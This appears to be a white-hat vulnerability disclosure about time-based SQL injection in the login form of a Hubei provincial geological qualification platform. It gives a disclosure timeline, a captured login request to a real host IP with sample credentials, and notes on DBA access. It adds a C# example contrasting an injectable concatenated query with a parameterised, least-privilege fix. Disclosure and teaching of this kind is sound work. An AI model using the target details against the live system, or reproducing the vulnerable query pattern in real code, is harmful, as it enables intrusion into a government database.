2014-01-13: Details sent to the vendor, awaiting handling
2014-01-18: Vendor confirmed; details disclosed to the vendor only
2014-01-28: Details disclosed to core white hats and relevant domain experts
2014-02-07: Details disclosed to ordinary white hats
2014-02-17: Details disclosed to intern white hats
2014-02-27: Details disclosed to the public

SQL injection in the Hubei Provincial Department of Land and Resources geological exploration qualification information platform

Following a link from the main site to this platform, the login form is vulnerable to SQL injection.
POST /website/ HTTP/1.1
Host: 119.97.204.213:8001
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://119.97.204.213:8001/website/
Cookie: ASP.NET_SessionId=ig1qc5biyegmuaogq5cfsg0l
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4940

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=[base64 ViewState blob omitted]&__VIEWSTATEGENERATOR=748D4755&__EVENTVALIDATION=%2FwEWBgK5lfSeCgLk1b%2BVAgLdhOHYDwLd1oT8DQLn%2Fa%2BbCgLo%2Fa%2BbCkKL3U9ruHvJFrALwpUDWJcFbEQRh5sLLyExkG%2F4rgXi&LoginWebUserControl1%24userName=admin&LoginWebUserControl1%24passWord=admin888&LoginWebUserControl1%24ImageButton1.x=32&LoginWebUserControl1%24ImageButton1.y=15&menu1=&menu1=%23&menu1=
22 databases in total; the current database is "XSYSTEM". The injection is time-based, which is too slow, so I did not dump it, but it runs with DBA privileges anyway....

Better to contact the developer; it seems several agencies are using this developer's system.
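The report does not publish the platform's code, so the following is an added illustration (not the vendor's code) of how a login form like this one ends up injectable on ASP.NET with SQL Server, and of the two fixes that close it: binding the input as parameters, and connecting with a low-privilege login rather than a sysadmin (DBA) account. The table and column names, the Users/Password schema and the connection strings are assumptions.

```csharp
// Added example, not code from the affected platform. Assumed: an ASP.NET WebForms
// login control whose fields match LoginWebUserControl1$userName / $passWord in the
// captured request, backed by SQL Server with a hypothetical Users table.
using System;
using System.Data;
using System.Data.SqlClient;

public static class LoginCheck
{
    // WEAK SETTING: the application logs in as a sysadmin, so any injected SQL
    // runs with server-wide rights (the "DBA privileges" observed in the report).
    public const string WeakConnectionString =
        "Server=DBHOST;Database=XSYSTEM;User Id=sa;Password=PLACEHOLDER;";

    // CORRECTED: a dedicated login that holds only the rights this form needs.
    // Grant it SELECT on dbo.Users (or EXECUTE on one stored procedure), nothing more.
    public const string LeastPrivilegeConnectionString =
        "Server=DBHOST;Database=XSYSTEM;User Id=website_login;Password=PLACEHOLDER;";

    // VULNERABLE: form input is concatenated into the SQL text, so quotes in the
    // userName or passWord value are parsed as SQL. With errors suppressed this
    // is still exploitable blind, by timing, which is what the report describes.
    public static bool IsValidUserVulnerable(SqlConnection conn, string userName, string passWord)
    {
        string sql = "SELECT COUNT(*) FROM dbo.Users WHERE UserName = '" + userName +
                     "' AND Password = '" + passWord + "'";
        using (var cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // FIXED: parameterised query. The values are sent as typed data, never as part
    // of the statement, so no input can change what the query does.
    // (Password storage should be hashed; that is a separate issue from injection.)
    public static bool IsValidUser(SqlConnection conn, string userName, string passWord)
    {
        const string sql =
            "SELECT COUNT(*) FROM dbo.Users WHERE UserName = @user AND Password = @pass";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = userName;
            cmd.Parameters.Add("@pass", SqlDbType.NVarChar, 128).Value = passWord;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Both fixes matter independently: parameterisation removes the injection, while the least-privilege login bounds the damage if another query somewhere in the application is still concatenated.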
Severity: High
Vulnerability rank: 11
Confirmed: 2014-01-18 09:21
None yet